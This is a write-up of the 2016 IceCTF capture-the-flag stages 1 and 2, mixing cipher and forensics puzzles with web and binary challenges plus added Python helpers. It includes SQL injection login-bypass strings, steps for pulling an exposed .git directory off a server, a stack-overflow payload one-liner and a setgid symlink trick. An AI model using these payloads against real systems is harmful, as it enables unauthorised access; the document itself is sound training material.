2016 Aug 20

https://play.icec.tf/

Stage 1

Hello World!

In this capture the flag competiton you're hunting for these strings, we call them "flags". These flags always begin with "IceCTF{" followed by a message in 1337sp34k and end with "}". Here's an example flag "IceCTF{h3l10_wr0ld}". Try submitting it through the text box down below!

The first challenge is a tutorial: it tells you that flags have the format IceCTF{xxxx}, and it also tells you that this challenge's flag is IceCTF{h3l10_wr0ld}.

Spotlight

Someone turned out the lights and now we can't find anything. Send halp! spotlight

This challenge draws an image on a JS canvas; wherever you move the mouse, the spotlight lights up that spot, but you will not find any useful clue in the image itself. Open spotlight.js and read the source code: searching for "flag" shows the answer, because the flag is printed to the console log.

All your Base are belong to us

What a mess... we got a raw flag but now what do we do... flag.txt

Write a short program that converts each binary byte into an ASCII character, and you get the flag.

Rotated!

They went and ROTated the flag by 5 and then ROTated it by 8! The scoundrels! Anyway once they were done this was all that was left VprPGS{jnvg_bar_cyhf_1_vf_3?}

ROT5 followed by ROT8 is just ROT13, so use ROT13 to turn every letter back and you get the flag: VprPGS => IceCTF.
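The two decoders used by "All your Base" and "Rotated!" in one script, as an added example that is not part of the original writeup. The binary sample is constructed; the ROT ciphertext is the one quoted in the challenge text. The `undo_rot` helper takes the list of shifts the challenge names (5 and 8) and applies their combined inverse, which is why the result is the same as a plain ROT13.

```python
"""Decoding helpers for the "All your Base" (binary bytes) and "Rotated!"
(ROT5 then ROT8) challenges.

Added example, not from the original writeup. SAMPLE_BINARY is constructed;
ROTATED_FLAG is the ciphertext quoted in the challenge description.
"""
import string


def decode_binary_words(text: str) -> str:
    """Turn 8-bit binary groups into text.

    Handles both layouts usually seen in flag files: one byte per
    whitespace-separated group, or one unbroken run of bits that is split
    into 8-bit chunks. Rejects anything that is not a clean multiple of 8 bits.
    """
    bits = "".join(text.split())
    if len(bits) % 8 != 0:
        raise ValueError("bit string length is not a multiple of 8")
    if set(bits) - {"0", "1"}:
        raise ValueError("input contains characters other than 0 and 1")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)).decode("ascii")


def rot(text: str, n: int) -> str:
    """Rotate ASCII letters by n positions; digits and punctuation pass through."""
    n %= 26
    lower = string.ascii_lowercase
    upper = string.ascii_uppercase
    table = str.maketrans(lower + upper, lower[n:] + lower[:n] + upper[n:] + upper[:n])
    return text.translate(table)


def undo_rot(text: str, *shifts: int) -> str:
    """Reverse a sequence of rotations by applying the negative of their sum."""
    return rot(text, -sum(shifts))


# constructed sample: the letters "Ice" as 8-bit binary groups
SAMPLE_BINARY = "01001001 01100011 01100101"
# ciphertext quoted in the challenge description
ROTATED_FLAG = "VprPGS{jnvg_bar_cyhf_1_vf_3?}"

if __name__ == "__main__":
    print(decode_binary_words(SAMPLE_BINARY))
    print(undo_rot(ROTATED_FLAG, 5, 8))
```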

Move Along

This site seems awfully suspicious, do you think you can figure out what they're hiding?

The move_along directory did not have web directory indexing turned off, and it contains files related to the flag.

Substituted

We got a substitute flag, I hear they are pretty lax on the rules... crypted.txt

In crypted.txt there is a piece of text that looks very much like a flag, "WvyVKT{jzgjrd_zwdkym_ke_reso_dsbdkwksky_tzjqd}". Obviously WvyVKT has to translate to IceCTF, so by studying the rest of the text and working out the mapping for each letter, you can recover the correct flag.
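The first step of that letter-by-letter recovery, as an added example that is not part of the original writeup: build a partial key from the crib "WvyVKT -> IceCTF", apply it to the quoted ciphertext with unknown letters shown as "?", and list cipher-letter frequencies to guess the rest. The ciphertext line is the one quoted above; everything else is added here.

```python
"""Partial-key recovery for a monoalphabetic substitution cipher.

Added example, not from the original writeup. CIPHER_FLAG is the line quoted
in the challenge; the key is only what the crib pins down.
"""
from collections import Counter


def key_from_crib(ciphertext: str, plaintext: str, key: dict = None) -> dict:
    """Extend a cipher->plain letter mapping from a known-plaintext fragment.

    Raises ValueError when the crib contradicts a mapping already in the key,
    which is the quickest way to rule out a wrong guess.
    """
    key = dict(key or {})
    if len(ciphertext) != len(plaintext):
        raise ValueError("crib and ciphertext fragment differ in length")
    for c, p in zip(ciphertext.lower(), plaintext.lower()):
        if not c.isalpha():
            continue
        if key.get(c, p) != p:
            raise ValueError(f"conflict: {c!r} already maps to {key[c]!r}, crib says {p!r}")
        key[c] = p
    return key


def apply_key(ciphertext: str, key: dict) -> str:
    """Decrypt with a possibly partial key, preserving case and non-letters."""
    out = []
    for ch in ciphertext:
        if not ch.isalpha():
            out.append(ch)
            continue
        p = key.get(ch.lower(), "?")
        out.append(p.upper() if ch.isupper() else p)
    return "".join(out)


def letter_frequencies(text: str) -> list:
    """Most common cipher letters first; compare against English frequencies to guess more."""
    return Counter(ch for ch in text.lower() if ch.isalpha()).most_common()


CIPHER_FLAG = "WvyVKT{jzgjrd_zwdkym_ke_reso_dsbdkwksky_tzjqd}"

if __name__ == "__main__":
    key = key_from_crib("WvyVKT", "IceCTF")
    print(apply_key(CIPHER_FLAG, key))
    print(letter_frequencies(CIPHER_FLAG)[:5])
```

Every further crib (a word you recognise in the partially decrypted text) goes through `key_from_crib` with the current key, so a guess that collides with an established mapping is rejected immediately instead of silently corrupting the key.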

IRC I

There is someone sharing flags on our IRC server, can you find him and stop him? glitch.is:6667

Check which rooms the user glitch has joined; one of those rooms contains the flag.

Alien Message

We found this suspicous image online and it looked like it had been planted there by an alien life form. Can you see if you can figure out what they're trying to tell us?

Searching Google for "alien message" turns up the lookup table, and with the table the flag is easy to read off: "good news i like futurama and their amazing easter eggs".

Time Traveler

I can assure you that the flag was on this website at some point in time.

The challenge clearly says "time travel", so either look at a future point in time or at a past one. The solution is to go to https://web.archive.org/, search for the time-traveler site, and find an archived copy of its page from the past.

Scavenger Hunt

There is a flag hidden somewhere on our website, do you think you can find it? Good luck!

This challenge only says the flag is hidden somewhere on their website and leaves the search to us, with very few clues. At first I thought it would be hidden in the shell, but the flag was not on the play.icec.tf site or any of its sub-pages. In the end I found it on the sponsors page of the main site.

Stage 2

Complacent

These silly bankers have gotten pretty complacent with their self signed SSL certificate. I wonder if there's anything in there. complacent.vuln.icec.tf

Inspect the SSL certificate and you will find the flag.

Hidden in Plain Sight

Make sure you take a real close look at it, it should be right there! /home/plain_sight/ or download it here

plain_sight tells us plainly that the flag is stored in the clear. Open the hex dump in vim with %!xxd, search for the string IceCTF, and you have the flag!
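The scripted form of "look at the hex dump and search for IceCTF", as an added example that is not part of the original writeup: extract every run of printable ASCII from a binary, the way strings(1) does, and grep those runs for a flag-shaped pattern. The binary blob is constructed, with a sample flag placed between non-printable bytes.

```python
"""Pull printable strings out of a binary and search them for a flag pattern.

Added example, not from the original writeup. SAMPLE is a constructed blob:
an ELF-like magic, non-printable filler, a symbol-like string, then a flag.
"""
import re

FLAG_RE = re.compile(r"IceCTF\{[^}]*\}")


def printable_strings(data: bytes, min_len: int = 4):
    """Yield (offset, text) for every run of printable ASCII of at least
    min_len bytes, the same idea as the Unix strings(1) tool."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield m.start(), m.group().decode("ascii")


def find_flags(data: bytes) -> list:
    """Return (offset, flag) pairs for every flag-shaped string in the blob."""
    found = []
    for offset, text in printable_strings(data):
        for m in FLAG_RE.finditer(text):
            found.append((offset + m.start(), m.group()))
    return found


# constructed sample: 8 header bytes, 32 non-printable bytes, a symbol name,
# 12 bytes of 0xff 0xfe filler, then the flag inside a longer string
SAMPLE = (b"\x7fELF\x01\x01\x01\x00" + bytes(range(0, 32))
          + b"some_symbol_name\x00" + b"\xff\xfe" * 6
          + b"padding IceCTF{constructed_sample_flag} more\x00" + bytes(range(128, 160)))

if __name__ == "__main__":
    for offset, text in printable_strings(SAMPLE):
        print(f"{offset:#08x}: {text}")
    print(find_flags(SAMPLE))
```

Reporting the byte offset alongside each hit is what makes the result useful next to a hex dump: the offset is the position to jump to in vim or xxd to see what surrounds the string.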

Flag Storage

What a cheat, I was promised a flag and I can't even log in. Can you get in for me? flagstorage.vuln.icec.tf. They seem to hash their passwords, but I think the problem is somehow related to this.

The challenge already tells us to use SQL injection, but entering ' or 1=1-- did not log us in. Reading the page source shows why: the password field is hashed with SHA-256 by JavaScript before it is submitted. Use Chrome's inspect element to modify the form so the password field sends the unhashed SQL injection string, and you get the flag.
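Why client-side hashing only got in the way of the injection rather than preventing it, as an added example that is not part of the original writeup and not the challenge site's code: a login query built by string formatting beside the parameterised version, run against an in-memory SQLite database with one constructed account. The hashed form of the payload contains no quote characters and so does nothing, which matches what the writeup observed; the raw payload bypasses the first query and fails against the second.

```python
"""Login query with string concatenation beside the parameterised version.

Added example, not from the original writeup and not the challenge site's
code. Uses an in-memory SQLite database with one constructed account.
"""
import hashlib
import sqlite3


def client_side_hash(password: str) -> str:
    """What the challenge's JavaScript did to the password field before submit."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    # constructed account; passwords are stored as SHA-256 like the challenge
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("alice", client_side_hash("correct horse")))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Builds the query by string formatting. Hashing happened only in the
    browser, so whatever the client actually sends lands inside the SQL text."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password_hash = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hashes on the server and binds both values as parameters, so the input
    is always data and never SQL, whatever characters it contains."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, client_side_hash(password)),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, "admin", "' or 1=1--"))                    # True
    print(login_vulnerable(conn, "admin", client_side_hash("' or 1=1--")))  # False
    print(login_safe(conn, "admin", "' or 1=1--"))                          # False
    print(login_safe(conn, "alice", "correct horse"))                       # True
```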

RSA?

John was messing with RSA again... he encrypted our flag! I have a strong feeling he had no idea what he was doing however, can you get the flag for us? flag.txt

Convert the variable c from hex to ASCII and you get the flag.

Thor's a hacker now

Thor has been staring at this for hours and he can't make any sense out of it, can you help him figure out what it is? thor.txt

Looking at the hex string, the first four characters read lzip. Searching for that name shows it is a compression tool much like gzip; the lzip manual is at http://www.nongnu.org/lzip/manual/lzip_manual.html. First download the lzip source code, then convert thor.txt into a binary file with the Linux command xxd -r, then run lzip -d thor.lz, which produces the error message below.

Example
  $ cat thor.txt | xxd -r > thor.lz
  $ lzip -d thor.lz
  thor.lz: Invalid dictionary size in member header.
  lzip: Deleting output file 'thor', if it exists.

The message tells us the file header is wrong, so look up the header format in the lzip manual: the DS (coded dictionary size, 1 byte) field sits at the sixth byte of the file. One byte has only 256 possible values, 0 to 255, so I wrote a small program that tries every value from 0 to 255 in the sixth byte; this decompressed the lzip file successfully and gave the flag.
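The same repair with the search space narrowed first, as an added example that is not part of the original writeup. It decodes the DS byte the way the lzip manual linked above describes it (bits 0-4 hold log2 of the base dictionary size, bits 5-7 the number of sixteenths to subtract, and legal sizes run from 4 KiB to 512 MiB), keeps only the DS values that decode to a legal size, and yields one patched header per candidate. The damaged header is constructed; the offset 5 used here is the "sixth byte" of the text, counted from zero.

```python
"""Enumerate legal lzip dictionary-size bytes instead of trying all 256 blindly.

Added example, not from the original writeup. Header layout and DS encoding
follow the lzip manual; DAMAGED is a constructed header with DS zeroed.
"""

MIN_DICT = 1 << 12   # 4 KiB, smallest legal dictionary
MAX_DICT = 1 << 29   # 512 MiB, largest legal dictionary
DS_OFFSET = 5        # "LZIP" (4 bytes) + version (1 byte), then DS


def dictionary_size(ds: int):
    """Decode a DS byte per the manual; return None if the size is out of range."""
    base = 1 << (ds & 0x1F)
    wedges = (ds >> 5) & 0x07
    size = base - (base // 16) * wedges
    if size < MIN_DICT or size > MAX_DICT:
        return None
    return size


def valid_ds_bytes() -> list:
    """All DS values that decode to a legal dictionary size."""
    return [ds for ds in range(256) if dictionary_size(ds) is not None]


def candidate_headers(damaged: bytes):
    """Yield (ds, patched_bytes) for every legal DS byte, leaving the rest intact.

    Each candidate is what you would hand to lzip -d (or lzip -t) in turn;
    the first one that decompresses cleanly is the right one.
    """
    if damaged[:4] != b"LZIP":
        raise ValueError("not an lzip member header")
    for ds in valid_ds_bytes():
        yield ds, damaged[:DS_OFFSET] + bytes([ds]) + damaged[DS_OFFSET + 1:]


# constructed: "LZIP", version 1, DS zeroed (invalid), then placeholder data
DAMAGED = b"LZIP\x01\x00" + b"\x00" * 10

if __name__ == "__main__":
    print(len(valid_ds_bytes()), "legal DS values out of 256")
    for ds, hdr in list(candidate_headers(DAMAGED))[:3]:
        print(f"DS={ds:#04x} size={dictionary_size(ds)} header={hdr[:6].hex()}")
```

Trying only the legal values is also a cheap sanity check on the rest of the approach: if none of them yields a clean decompression, the damage is not confined to the DS byte.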

Exposed!

John is pretty happy with himself, he just made his first website! He used all the hip and cool systems, like NginX, PHP and Git! Everyone is so happy for him, but can you get him to give you the flag?

This site uploaded its .git directory to the server along with everything else, so we need to pull the commit data out of .git and find the flag in it. The method is described in this tutorial: https://en.internetwache.org/dont-publicly-expose-git-or-how-we-downloaded-your-websites-sourcecode-an-analysis-of-alexas-1m-28-07-2015/.

First download http://exposed.vuln.icec.tf/.git/refs/heads/master, which gives an object id (a hash). With that id, build the path ".git/objects/a0/1751ff89f1c1dfca8b16a81d7dd1f28c18d9ca", and you can download the files inside .git.

We find a flag.txt, but it is not the answer: IceCTF{this_isnt_the_flag_either}.

An older flag.php contains the flag IceCTF{not_this_flag}, but that is not the answer either.

Finally, after downloading every blob object, the correct flag turned up in one of the git objects.

After the competition I wrote a tool that downloads a .git directory automatically: https://github.com/puritys/download-git
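What a downloaded git object actually contains, as an added example that is not part of the original writeup and not the linked tool's code. Git stores each loose object zlib-compressed as "type size\0body" under .git/objects/ab/cdef... (the first two hex characters of the id form the directory, exactly the path shape quoted above), and the object id is the SHA-1 of the uncompressed header plus body. The parser below recomputes that id and checks the declared size, so a truncated or tampered object is rejected rather than trusted; the blob it parses is constructed.

```python
"""Parse a git loose object, verifying its header and object id.

Added example, not from the original writeup and not the linked tool's code.
SAMPLE_OBJ is a constructed blob standing in for a committed file.
"""
import hashlib
import zlib


def object_path(object_id: str) -> str:
    """Map a 40-hex object id to its loose-object path under .git."""
    object_id = object_id.strip().lower()
    if len(object_id) != 40 or any(c not in "0123456789abcdef" for c in object_id):
        raise ValueError("object id must be 40 hex characters")
    return f".git/objects/{object_id[:2]}/{object_id[2:]}"


def pack_object(obj_type: str, body: bytes) -> tuple:
    """Build a loose object as git would: returns (object_id, compressed_bytes)."""
    raw = f"{obj_type} {len(body)}\0".encode() + body
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def parse_object(compressed: bytes, expected_id: str = None) -> tuple:
    """Inflate a loose object, check its header and optionally its id.

    Returns (type, body). Raises ValueError on a malformed header, a size
    mismatch, or an id mismatch, so a corrupt download is not silently used.
    """
    raw = zlib.decompress(compressed)
    header, sep, body = raw.partition(b"\0")
    if not sep:
        raise ValueError("no NUL after object header")
    obj_type, _, size = header.decode("ascii").partition(" ")
    if obj_type not in ("blob", "tree", "commit", "tag") or not size.isdigit():
        raise ValueError(f"bad object header {header!r}")
    if int(size) != len(body):
        raise ValueError("object size does not match header")
    if expected_id is not None and hashlib.sha1(raw).hexdigest() != expected_id:
        raise ValueError("object id does not match content")
    return obj_type, body


# constructed blob standing in for a committed file
SAMPLE_ID, SAMPLE_OBJ = pack_object("blob", b"IceCTF{constructed_sample_flag}\n")

if __name__ == "__main__":
    print(object_path(SAMPLE_ID))
    print(parse_object(SAMPLE_OBJ, SAMPLE_ID))
```

On the server side the fix is to keep .git out of the web root entirely, or at least to have the web server deny requests for paths beginning with /.git, since a single readable refs file is enough to start walking the object store as described above.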

Smashing Profit!

Do you think you can make this program jump to somewhere it isn't supposed to? Where we're going we don't need buffers! /home/profit/ on the shell.

Log in to the IceCTF shell, then run gdb profit to look at the program's assembly. Use disass main and disass start, then disassemble at an address of your own choosing, disass 0x0804850c, which reveals a function called flag.

  • disass main, disass start, disass flag
  • Run profit with a very long argument, trying to make the program core dump, and note down the length of the argument.
  • In gdb, inspect the memory from the core dump; you will find the address that our buffer overflow overwrote.
  • This challenge needs two places overwritten: 1. 0x0804850b, the entry point of the flag function, and 2. 0x0804858d, the entry point of main. The program then jumps to the addresses we overwrote, runs flag first and then main once more, and prints the flag.
Example
  echo -e 0x8d,0x85,0x04,0x08,0x0b,0x85,0x04,0x08 | xxd -r | xargs -t -n 1 -I% echo "aaaaaaaaaaaaaaaaabbbbbbbbaaaaaaaaaaaaaaaaabbbbbbbbaaabbbbaaaaaaaaaaaflag%" | ./profit

  //result
  Smashing the stack for fun and...?
  IceCTF{who_xxx_xxxxx}

Demo

I found this awesome premium shell, but my demo version just ran out... can you help me crack it? /home/demo/ on the shell.
file list
  -rwxr-sr-x 1 root demo 5.6K Aug 12 09:08 demo
  -rw-r--r-- 1 root root 458 Aug 12 09:08 demo.c
  -r--r----- 1 root demo 33 Aug 12 09:08 flag.txt
  -rw-r--r-- 1 root root 83 Aug 12 09:08 Makefile

getenv("_") returns the name of the executable (demo, for example), so I renamed demo to icesh, which passes the first check and drops into the shell. But that shell runs as our own account, which still has no permission to read flag.txt. Reading the code further, there is a line with getegid and setresgid: it takes the effective group id, which is the file's group, and sets it as the real group id. So it seems we have to run the original demo binary, because only that file carries the demo group. In the end I used a symbolic link to get the flag: ln -s /home/demo/demo ~/icesh

Miners!

The miners website has been working on adding a login portal so that all miners can get the flag, but they haven't made any accounts! However, your boss demands the flag now! Can you get in anyway? miners.vuln.icec.tf

The database has no accounts, so a union is used to produce a row: "' union all select ...".

Kitty

They managed to secure their website this time and moved the hashing to the server :(. We managed to leak this hash of the admin's password though! c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a. Can you get the flag? kitty.vuln.icec.tf

Google that hash string and you will learn that the password is "?o??*".
